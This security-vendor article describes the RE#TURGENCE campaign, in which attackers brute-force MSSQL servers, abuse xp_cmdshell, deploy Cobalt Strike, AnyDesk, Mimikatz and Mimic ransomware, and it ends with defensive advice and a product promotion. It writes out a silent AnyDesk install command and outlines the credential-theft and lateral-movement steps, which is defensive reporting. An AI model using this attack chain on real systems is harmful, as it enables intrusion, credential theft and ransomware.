Network Security
Vulnerability Management
Privileged Access Management
Endpoint Security
Threat Hunting
Unified Endpoint Management
Email & Collaboration Security
Contents:
Threat actors use AnyDesk to install Mimic ransomware and exploit poorly configured MSSQL database servers.
Security researchers dubbed this ransomware campaign RE#TURGENCE.
Mimic ransomware attacks on MSSQL servers explained
According to security researchers, the attacks followed a series of steps:
Obtain initial access through brute force
After gaining access to the victim`s server, hackers use the xp_cmdshell to run commands.
xp_cmdshell should not be enabled on servers, especially on those that are publicly exposed. Usually, this procedure is disabled by default.
Run PowerShell encoded command
If the xp_cmdshell procedure is available, hackers will run a PowerShell command to download a file (189Jt) from the remote server.
Obfuscated Cobalt Strike payload deployment
To install the Cobalt Strike payload, the attackers use a sequence of PowerShell scripts and in-memory reflection techniques. Their aim is to inject it into the Windows-native process SndVol.exe.
AnyDesk remote desktop app download
The next step is to use the command “c:\ad.exe –install c:\”program files (x86)”\ –silent” to install AnyDesk. After adding a new user to the administrators group, hackers collect clear text credentials. They use AnyDesk to:
– download Mimikatz, for exfiltrating credentials
– download Advanced Port Scanner, to explore the network and domain
Hacking other devices
Further on, hackers use Advanced Port Scanner and the credentials obtained through Mimikatz to compromise other endpoints in the network. Thus, they manage to move laterally within the system.
Mimic ransomware deployment
For this step hackers used AnyDesk again, to install Mimic ransomware. Then they located and encrypted the targeted files.
Who`s vulnerable to MSSQL Servers Mimic Ransomware Attacks
The financially motivated Turkish hackers behind the campaign targeted Microsoft SQL servers worldwide. Their victims are businesses based in the European Union, United States and Latin America.
The one thing they all have in common is poor securing of their Microsoft SQL servers.
In this case, there were two main, simple to avoid, issues:
- Leaving the xp_cmdshell procedure enabled, although hackers can easily use it to run commands on the operating system.
xp_cmdshell is usually disabled by default, according to the evergreen cybersecurity principle „Turn off what you don`t use”.
How to prevent initial access through brute force attacks
To avoid being a victim of the RE#TURGENCE ransomware campaign, follow my best practices against brute force attacks shortlist:
- Enable multi-factor authentication
- Enforce a strong password policy
- Rate-limit login attempts
- Use Heimdal’s Next-Generation Antivirus & MDM Anti-Brute-Force to generate blocking rules for vulnerable ports and isolate compromised devices.
If you liked this article, follow us on LinkedIn, Twitter, Facebook, and Youtube, for more cybersecurity news and topics.
Heimdal® Next-Gen Endpoint Antivirus
- Multiple layers of detection.
- Enhanced Brute-Force Protection.
- Remote device control with MDM.
